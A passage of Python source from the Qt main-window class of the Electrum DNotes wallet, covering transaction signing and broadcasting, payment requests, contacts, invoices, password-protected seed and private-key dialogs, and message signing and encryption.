    #if fee > confirm_rate * tx.estimated_size() / 1000:
    #msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        password = self.password_dialog('\n'.join(msg))
        if not password:
            return
    else:
        msg.append(_('Proceed?'))
        password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        if success:
            if not tx.is_complete():
                # partially signed (e.g. multisig): show instead of broadcasting
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
    # Password-gated entry point: @protected prompts the user and injects
    # 'password' (None for unencrypted wallets or on cancel).
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_signed(result):
        callback(True)
    def on_failed(exc_info):
        # surface the exception in the GUI, then report failure
        self.on_error(exc_info)
        callback(False)
    if self.tx_external_keypairs:
        # can sign directly
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        # call hook to see if plugin needs gui interaction
        run_hook('sign_tx', self, tx)
        task = partial(self.wallet.sign_transaction, tx, password)
    WaitingDialog(self, _('Signing transaction...'), task,
                  on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
    """Broadcast *tx* in a worker thread; report the outcome in the GUI thread.

    Handles BIP70 payment requests: marks the invoice paid and sends the
    ack with a refund address on success.
    """
    def broadcast_thread():
        # non-GUI thread
        pr = self.payment_request
        if pr and pr.has_expired():
            self.payment_request = None
            return False, _("Payment request has expired")
        status, msg = self.network.broadcast(tx)
        if pr and status is True:
            self.invoices.set_paid(pr, tx.txid())
            self.invoices.save()
            self.payment_request = None
            refund_address = self.wallet.get_receiving_addresses()[0]
            ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
            if ack_status:
                msg = ack_msg
        return status, msg
    # Capture current TL window; override might be removed on return
    parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
    def broadcast_done(result):
        # GUI thread
        if result:
            status, msg = result
            if status:
                if tx_desc is not None and tx.is_complete():
                    self.wallet.set_label(tx.txid(), tx_desc)
                parent.show_message(_('Payment sent.') + '\n' + msg)
                self.invoice_list.update()
                self.do_clear()
            else:
                parent.show_error(msg)
    WaitingDialog(self, _('Broadcasting transaction...'),
                  broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
    """Show a modal dialog asking the user to pick one of *choices*.

    Returns the selected index, or None if the dialog was dismissed.
    Needed by QtHandler for hardware wallets.
    """
    dlg = WindowModalDialog(self.top_level_window())
    choice_layout = ChoicesLayout(msg, choices)
    outer = QVBoxLayout(dlg)
    outer.addLayout(choice_layout.layout())
    outer.addLayout(Buttons(OkButton(dlg)))
    accepted = dlg.exec_()
    return choice_layout.selected_index() if accepted else None
def lock_amount(self, b):
    """Freeze/unfreeze the amount field; the Max button is only usable
    while the amount is editable."""
    self.amount_e.setFrozen(b)
    self.max_button.setEnabled(not b)
def lock_invoice(self, b):
    """Freeze/unfreeze the invoice field."""
    self.invoice_e.setFrozen(b)
def prepare_for_payment_request(self):
    """Switch to the send tab and freeze its inputs while a payment
    request is being fetched; always returns True."""
    self.show_send_tab()
    self.payto_e.is_pr = True
    for field in (self.payto_e, self.amount_e, self.message_e, self.invoice_e):
        field.setFrozen(True)
    self.payto_e.setText(_("please wait..."))
    return True
def delete_invoice(self, key):
    """Remove invoice *key* from the wallet and refresh the invoice list."""
    self.invoices.remove(key)
    self.invoice_list.update()
def payment_request_ok(self):
    """Handle a successfully verified payment request: register it as an
    invoice and populate the send tab, or bail out if it was already paid."""
    pr = self.payment_request
    key = self.invoices.add(pr)
    status = self.invoices.get_status(key)
    self.invoice_list.update()
    if status == PR_PAID:
        self.show_message("invoice already paid")
        self.do_clear()
        self.payment_request = None
        return
    self.payto_e.is_pr = True
    # color the payto field by request state
    if not pr.has_expired():
        self.payto_e.setGreen()
    else:
        self.payto_e.setExpired()
    self.payto_e.setText(pr.get_requestor())
    self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
    self.message_e.setText(pr.get_memo())
    # signal to set fee
    self.amount_e.textEdited.emit("")
def payment_request_error(self):
    """Handle a payment request that failed verification: show the error
    and reset the send tab."""
    self.show_message(self.payment_request.error)
    self.payment_request = None
    self.do_clear()
def on_pr(self, request):
    """Store an incoming payment *request* and emit the matching signal
    (handled on the GUI thread) depending on whether it verifies."""
    self.payment_request = request
    verified = self.payment_request.verify(self.contacts)
    if verified:
        self.payment_request_ok_signal.emit()
    else:
        self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
    """Populate the send tab from a ``dnotes:`` payment URI.

    A URI carrying a BIP70 request ('r', or 'name'+'sig') triggers an
    async fetch via on_pr; otherwise address/amount/message fields are
    filled in directly.
    """
    if not URI:
        return
    try:
        parsed = util.parse_URI(URI, self.on_pr)
    except BaseException as exc:
        self.show_error(_('Invalid DNotes URI:') + '\n' + str(exc))
        return
    self.show_send_tab()
    has_request = parsed.get('r') or (parsed.get('name') and parsed.get('sig'))
    if has_request:
        self.prepare_for_payment_request()
        return
    address = parsed.get('address')
    amount = parsed.get('amount')
    # fall back to the label as description (not BIP21 compliant)
    message = parsed.get('message') or parsed.get('label')
    if address:
        self.payto_e.setText(address)
    if message:
        self.message_e.setText(message)
    if amount:
        self.amount_e.setAmount(amount)
        self.amount_e.textEdited.emit("")
def do_clear(self):
    """Reset the send tab to its initial empty state."""
    self.is_max = False
    self.not_enough_funds = False
    self.payment_request = None
    self.payto_e.is_pr = False
    editable_fields = (self.payto_e, self.message_e, self.amount_e,
                       self.invoice_e, self.fiat_send_e, self.fee_e,
                       self.feerate_e)
    for field in editable_fields:
        field.setText('')
        field.setFrozen(False)
    self.fee_slider.activate()
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.size_e.setAmount(0)
    self.feerounding_icon.setVisible(False)
    self.set_pay_from([])
    self.tx_external_keypairs = {}
    self.update_status()
    run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
    """Freeze or unfreeze *addrs* for spending and refresh dependent views."""
    self.wallet.set_frozen_state(addrs, freeze)
    self.address_list.update()
    self.utxo_list.update()
    self.update_fee()
def create_list_tab(self, l, toolbar=None):
    """Wrap list widget *l* (and an optional toolbar) in a plain tab
    container; the widget is tagged as searchable for do_search()."""
    container = QWidget()
    container.searchable_list = l
    layout = QVBoxLayout()
    container.setLayout(layout)
    layout.setContentsMargins(0, 0, 0, 0)
    layout.setSpacing(0)
    if toolbar:
        layout.addLayout(toolbar)
    layout.addWidget(l)
    return container
def create_addresses_tab(self):
    """Build the addresses tab, restoring toolbar visibility from config."""
    from .address_list import AddressList
    self.address_list = addr_list = AddressList(self)
    toolbar = addr_list.create_toolbar(self.config)
    addr_list.show_toolbar(self.config.get('show_toolbar_addresses', False))
    return self.create_list_tab(addr_list, toolbar)
def create_utxo_tab(self):
    """Build the coins (UTXO) tab."""
    from .utxo_list import UTXOList
    utxo_list = UTXOList(self)
    self.utxo_list = utxo_list
    return self.create_list_tab(utxo_list)
def create_contacts_tab(self):
    """Build the contacts tab."""
    from .contact_list import ContactList
    contact_list = ContactList(self)
    self.contact_list = contact_list
    return self.create_list_tab(contact_list)
def remove_address(self, addr):
    """Delete *addr* from the wallet after user confirmation and refresh views."""
    if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
        self.wallet.delete_address(addr)
        self.need_update.set()  # history, addresses, coins
        self.clear_receive_tab()
def get_coins(self):
    """Return the coins preselected in 'pay from', or every spendable
    coin in the wallet when no explicit selection exists."""
    return self.pay_from or self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
    """Preselect *coins* as inputs and switch to the send tab."""
    self.set_pay_from(coins)
    self.show_send_tab()
    self.update_fee()
def paytomany(self):
    """Switch the send tab into multi-output mode and show usage help."""
    self.show_send_tab()
    self.payto_e.paytomany()
    instructions = (
        _('Enter a list of outputs in the \'Pay to\' field.'),
        _('One output per line.'),
        _('Format: address, amount'),
        _('You may load a CSV file using the file icon.'),
    )
    self.show_message('\n'.join(instructions), title=_('Pay to many'))
def payto_contacts(self, labels):
    """Fill the send tab's payto field from the selected contact *labels*.

    A single contact focuses the amount field; multiple contacts produce
    a 'pay to many' list with zero amounts for the user to edit.
    """
    recipients = [self.get_contact_payto(label) for label in labels]
    self.show_send_tab()
    if len(recipients) == 1:
        self.payto_e.setText(recipients[0])
        self.amount_e.setFocus()
    else:
        self.payto_e.setText("\n".join(r + ", 0" for r in recipients))
        self.payto_e.setFocus()
def set_contact(self, label, address):
    """Add or update a contact keyed by *address*.

    Returns True on success, False when the address is invalid.
    """
    if not is_address(address):
        self.show_error(_('Invalid Address'))
        self.contact_list.update() # Displays original unchanged value
        return False
    self.contacts[address] = ('address', label)
    self.contact_list.update()
    self.history_list.update()
    self.update_completions()
    return True
def delete_contacts(self, labels):
    """Remove the given contact keys after one combined confirmation."""
    if not self.question(_("Remove {} from your list of contacts?")
                         .format(" + ".join(labels))):
        return
    for label in labels:
        self.contacts.pop(label)
    self.history_list.update()
    self.contact_list.update()
    self.update_completions()
def show_invoice(self, key):
    """Look up invoice *key*, refresh its verification status, and show
    its details dialog; shows an error if the key is unknown."""
    request = self.invoices.get(key)
    if request is None:
        self.show_error('Cannot find payment request in wallet.')
        return
    request.verify(self.contacts)
    self.show_pr_details(request)
def show_pr_details(self, pr):
    """Show a modal dialog with the details of payment request *pr*,
    offering export (BIP70 file) and delete actions."""
    key = pr.get_id()
    d = WindowModalDialog(self, _("Invoice"))
    vbox = QVBoxLayout(d)
    grid = QGridLayout()
    grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
    grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
    grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
    outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
    grid.addWidget(QLabel(outputs_str), 1, 1)
    expires = pr.get_expiration_date()
    grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
    grid.addWidget(QLabel(pr.get_memo()), 2, 1)
    grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
    grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
    if expires:
        grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
        grid.addWidget(QLabel(format_time(expires)), 4, 1)
    vbox.addLayout(grid)
    def do_export():
        # Save the raw BIP70 payment request to a user-chosen file.
        fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
        if not fn:
            return
        with open(fn, 'wb') as f:
            f.write(pr.raw)  # byte count returned by write() is not needed
        # FIX: the filename must stay outside the _() call — the original
        # code translated 'Invoice saved as <fn>', a msgid that varies per
        # file and therefore can never have a translation.
        self.show_message(_('Invoice saved as') + ' ' + fn)
    exportButton = EnterButton(_('Save'), do_export)
    def do_delete():
        if self.question(_('Delete invoice?')):
            self.invoices.remove(key)
            self.history_list.update()
            self.invoice_list.update()
            d.close()
    deleteButton = EnterButton(_('Delete'), do_delete)
    vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
    d.exec_()
def do_pay_invoice(self, key):
    """Load invoice *key* into the send tab and re-verify it, dispatching
    to the ok/error handler accordingly."""
    request = self.invoices.get(key)
    self.payment_request = request
    self.prepare_for_payment_request()
    request.error = None  # clearing the error forces verify() to re-run
    verified = request.verify(self.contacts)
    if verified:
        self.payment_request_ok()
    else:
        self.payment_request_error()
def create_console_tab(self):
    """Build the console tab widget."""
    from .console import Console
    console = Console()
    self.console = console
    return console
def update_console(self):
    """(Re)populate the console namespace with wallet/network objects and
    one wrapper per CLI command, restoring command history from config."""
    console = self.console
    console.history = self.config.get("console-history",[])
    console.history_index = len(console.history)
    console.updateNamespace({'wallet' : self.wallet,
                             'network' : self.network,
                             'plugins' : self.gui_object.plugins,
                             'window': self})
    console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
    c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
    methods = {}
    def mkfunc(f, method):
        # bind 'method' now (avoids the late-binding closure pitfall);
        # password_dialog is passed so commands can prompt when needed
        return lambda *args: f(method, args, self.password_dialog)
    for m in dir(c):
        # skip private attributes and names already in the namespace
        if m[0]=='_' or m in ['network','wallet']: continue
        methods[m] = mkfunc(c._run, m)
    console.updateNamespace(methods)
def create_status_bar(self):
    """Build the main-window status bar: balance label, hidden search box,
    and the password / preferences / seed / network buttons.

    FIX: removed the dead ``qtVersion = qVersion()`` local — it was
    assigned and never used anywhere in this method.
    """
    sb = QStatusBar()
    sb.setFixedHeight(35)
    self.balance_label = QLabel("")
    self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
    sb.addWidget(self.balance_label)
    self.search_box = QLineEdit()
    self.search_box.textChanged.connect(self.do_search)
    self.search_box.hide()  # toggled by toggle_search()
    sb.addPermanentWidget(self.search_box)
    # actual lock/unlock icon is set later by update_lock_icon()
    self.lock_icon = QIcon()
    self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
    sb.addPermanentWidget(self.password_button)
    sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
    self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
    sb.addPermanentWidget(self.seed_button)
    self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
    sb.addPermanentWidget(self.status_button)
    run_hook('create_status_bar', sb)
    self.setStatusBar(sb)
def update_lock_icon(self):
    """Reflect password protection in the status-bar lock icon."""
    if self.wallet.has_password():
        icon = QIcon(":icons/lock.png")
    else:
        icon = QIcon(":icons/unlock.png")
    self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
    """Show/hide seed, password and send buttons per wallet capabilities."""
    self.seed_button.setVisible(self.wallet.has_seed())
    self.password_button.setVisible(self.wallet.may_have_password())
    self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
    """Change (set/unset) the wallet password.

    Wallets whose storage is encrypted with an xpub-derived key (hardware
    wallets) use a dedicated dialog, since the effective password comes
    from the device rather than from the user.
    """
    from electrum_dnotes.storage import STO_EV_XPUB_PW
    if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
        from .password_dialog import ChangePasswordDialogForHW
        d = ChangePasswordDialogForHW(self, self.wallet)
        ok, encrypt_file = d.run()
        if not ok:
            return
        try:
            # may involve interacting with the hardware device
            hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
        except UserCancelled:
            return
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            self.show_error(str(e))
            return
        old_password = hw_dev_pw if self.wallet.has_password() else None
        new_password = hw_dev_pw if encrypt_file else None
    else:
        from .password_dialog import ChangePasswordDialogForSW
        d = ChangePasswordDialogForSW(self, self.wallet)
        ok, old_password, new_password, encrypt_file = d.run()
        if not ok:
            return
    try:
        self.wallet.update_password(old_password, new_password, encrypt_file)
    except InvalidPassword as e:
        self.show_error(str(e))
        return
    except BaseException:
        traceback.print_exc(file=sys.stdout)
        self.show_error(_('Failed to update password'))
        return
    msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
    self.show_message(msg, title=_("Success"))
    self.update_lock_icon()
def toggle_search(self):
    """Toggle visibility of the status-bar search box; focus it when
    shown, clear any active filter when hidden.

    FIX: dropped the commented-out searchable_list toolbar experiment and
    the ``tab`` local that only that dead code referenced.
    """
    self.search_box.setHidden(not self.search_box.isHidden())
    if not self.search_box.isHidden():
        self.search_box.setFocus(1)
    else:
        self.do_search('')
def do_search(self, t):
    """Apply filter text *t* to the current tab's list, if it has one."""
    current_tab = self.tabs.currentWidget()
    searchable = getattr(current_tab, 'searchable_list', None)
    if searchable is not None:
        searchable.filter(t)
def new_contact_dialog(self):
    """Prompt for an address and a name and add them as a contact."""
    d = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    line1 = QLineEdit()   # address
    line1.setFixedWidth(280)
    line2 = QLineEdit()   # name
    line2.setFixedWidth(280)
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(line1, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(line2, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if d.exec_():
        # set_contact(label, address)
        self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
    """Show wallet metadata (name, type, script type) and its master
    public key(s), with a cosigner selector for multisig wallets."""
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(500, 100)
    mpk_list = self.wallet.get_master_public_keys()
    vbox = QVBoxLayout()
    wallet_type = self.wallet.storage.get('wallet_type', '')
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    vbox.addLayout(grid)
    if self.wallet.is_deterministic():
        mpk_text = ShowQRTextEdit()
        mpk_text.setMaximumHeight(150)
        mpk_text.addCopyButton(self.app)
        def show_mpk(index):
            mpk_text.setText(mpk_list[index])
        # only show the combobox in case multiple accounts are available
        if len(mpk_list) > 1:
            def label(key):
                if isinstance(self.wallet, Multisig_Wallet):
                    return _("cosigner") + ' ' + str(key+1)
                return ''
            labels = [label(i) for i in range(len(mpk_list))]
            on_click = lambda clayout: show_mpk(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        else:
            vbox.addWidget(QLabel(_("Master Public Key")))
        show_mpk(0)
        vbox.addWidget(mpk_text)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Ask for confirmation, then delete the current wallet file."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s" % self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if self.question(prompt):
        self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Actually delete the wallet file (password confirmed by @protected):
    stop the daemon's wallet, close this window, then unlink the file."""
    wallet_path = self.wallet.storage.path
    basename = os.path.basename(wallet_path)
    self.gui_object.daemon.stop_wallet(wallet_path)
    self.close()
    os.unlink(wallet_path)
    self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
    """Display the wallet seed (and passphrase, if any) after the
    password check performed by @protected."""
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    keystore = self.wallet.get_keystore()
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except BaseException as e:
        self.show_error(str(e))
        return
    from .seed_dialog import SeedDialog
    d = SeedDialog(self, seed, passphrase)
    d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
    """Display *data* in a modal QR-code dialog; no-op for empty data."""
    if not data:
        return
    dialog = QRDialog(data, parent or self, title)
    dialog.exec_()
@protected
def show_private_key(self, address, password):
    """Show the private key (and redeem script, if any) for *address*
    in a modal dialog; password is prompted for by @protected."""
    if not address:
        return
    try:
        pk, redeem_script = self.wallet.export_private_key(address, password)
    except Exception as e:
        traceback.print_exc(file=sys.stdout)
        self.show_message(str(e))
        return
    # script type is encoded in the WIF prefix
    xtype = bitcoin.deserialize_privkey(pk)[0]
    d = WindowModalDialog(self, _("Private key"))
    d.setMinimumSize(600, 150)
    vbox = QVBoxLayout()
    vbox.addWidget(QLabel(_("Address") + ': ' + address))
    vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
    vbox.addWidget(QLabel(_("Private key") + ':'))
    keys_e = ShowQRTextEdit(text=pk)
    keys_e.addCopyButton(self.app)
    vbox.addWidget(keys_e)
    if redeem_script:
        vbox.addWidget(QLabel(_("Redeem Script") + ':'))
        rds_e = ShowQRTextEdit(text=redeem_script)
        rds_e.addCopyButton(self.app)
        vbox.addWidget(rds_e)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    d.exec_()
# Class-level message shown by do_sign() when the entered address type
# has no unique public key, so message signing is not defined for it.
msg_sign = _("Signing with an address actually means signing with the corresponding "
             "private key, and verifying with the corresponding public key. The "
             "address you have entered does not have a unique public key, so these "
             "operations cannot be performed.") + '\n\n' + \
           _('The operation is undefined. Not just in Electrum DNotes, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign *message* with the key for *address* in the wallet thread and
    put the base64 signature into the *signature* widget.

    The three widget arguments are Qt input fields, not plain strings.
    """
    address  = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid DNotes address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    txin_type = self.wallet.get_txin_type(address)
    if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
        # see msg_sign above: these address types have no unique pubkey
        self.show_message(_('Cannot sign messages with this type of address:') + \
                          ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    task = partial(self.wallet.sign_message, address, message, password)
    def show_signed_message(sig):
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify a base64 signature over *message* for *address*.

    The three arguments are Qt input widgets; any decoding or
    verification failure is reported as a wrong signature.
    """
    addr_text = address.text().strip()
    msg_bytes = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(addr_text):
        self.show_message(_('Invalid DNotes address.'))
        return
    verified = False
    try:
        # b64decode raises on malformed input
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = bitcoin.verify_message(addr_text, sig, msg_bytes)
    except Exception:
        pass
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Open the sign/verify message dialog, optionally pre-filled with
    *address*; wires the buttons to do_sign()/do_verify()."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Sign"))
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext field with the wallet key for the given
    pubkey; runs in the wallet thread (password prompted by @protected)."""
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    cyphertext = encrypted_e.toPlainText()
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
    def setText(text):
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # (message_e) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the message field to the given public key and display the
    ASCII ciphertext; failures are shown as a warning."""
    plaintext = message_e.toPlainText().encode('utf-8')
    try:
        ciphertext = bitcoin.encrypt_message(plaintext, pubkey_e.text())
        encrypted_e.setText(ciphertext.decode('ascii'))
    except BaseException as exc:
        traceback.print_exc(file=sys.stdout)
        self.show_warning(str(exc))
def encrypt_message(self, address=''):
    """Open the encrypt/decrypt message dialog; when *address* is given,
    its public key pre-fills the pubkey field."""
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for the wallet password; returns the entered password or
    None if cancelled. *parent* defaults to this window."""
    from .password_dialog import PasswordDialog
    dlg = PasswordDialog(parent or self, msg)
    return dlg.run()
def tx_from_text(self, txt):
    """Parse raw transaction text into a Transaction, or show a critical
    error and return None when parsing fails."""
    from electrum_dnotes.transaction import tx_from_str
    try:
        return Transaction(tx_from_str(txt))
    except BaseException as exc:
        self.show_critical(_("Electrum DNotes was unable to parse your transaction") + ":\n" + str(exc))
        return
def read_tx_from_qrcode(self):
    """Scan a QR code: dispatch payment URIs to pay_to_URI(), otherwise
    treat the payload as a base43-encoded transaction and display it."""
    from electrum_dnotes import qrscanner
    try:
        data = qrscanner.scan_barcode(self.config.get_video_device())
    except BaseException as e:
        self.show_error(str(e))
        return
    if not data:
        return
    # if the user scanned a bitcoin URI
    if str(data).startswith("dnotes:"):
        self.pay_to_URI(data)
        return
    # else if the user scanned an offline signed tx
    try:
        # QR codes carry transactions in base43 for density
        data = bh2u(bitcoin.base_decode(data, length=None, base=43))
    except BaseException as e:
        self.show_error((_('Could not decode QR code')+':\n{}').format(e))
        return
    tx = self.tx_from_text(data)
    if not tx:
        return
    self.show_transaction(tx)
def read_tx_from_file(self):
    """Prompt for a .txn file and parse it; returns a Transaction or None."""
    path = self.getOpenFileName(_("Select your transaction file"), "*.txn")
    if not path:
        return
    try:
        with open(path, "r") as f:
            contents = f.read()
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum DNotes was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
        return
    return self.tx_from_text(contents)
def do_process_from_text(self):
    """Prompt for a raw transaction in text form and display it."""
    raw = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
    if not raw:
        return
    tx = self.tx_from_text(raw)
    if tx:
        self.show_transaction(tx)
def do_process_from_file(self):
    """Load a transaction from a .txn file and display it."""
    tx = self.read_tx_from_file()
    if tx:
        self.show_transaction(tx)
def do_process_from_txid(self):
    """Prompt for a txid, fetch the raw transaction from the server
    (blocking call), and display it."""
    from electrum_dnotes import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if ok and txid:
        txid = str(txid).strip()
        try:
            r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
        except BaseException as e:
            self.show_message(str(e))
            return
        tx = transaction.Transaction(r)
        self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
    """Export every private key in the wallet to a CSV or JSON file.

    Keys are derived on a background thread (may require slow per-address
    work); progress and completion are marshalled back to the GUI thread
    via computing_privkeys_signal / show_privkeys_signal. Closing the
    dialog cancels the worker via the done/cancelled flags.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-dnotes-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    b.setEnabled(False)   # enabled once all keys are computed
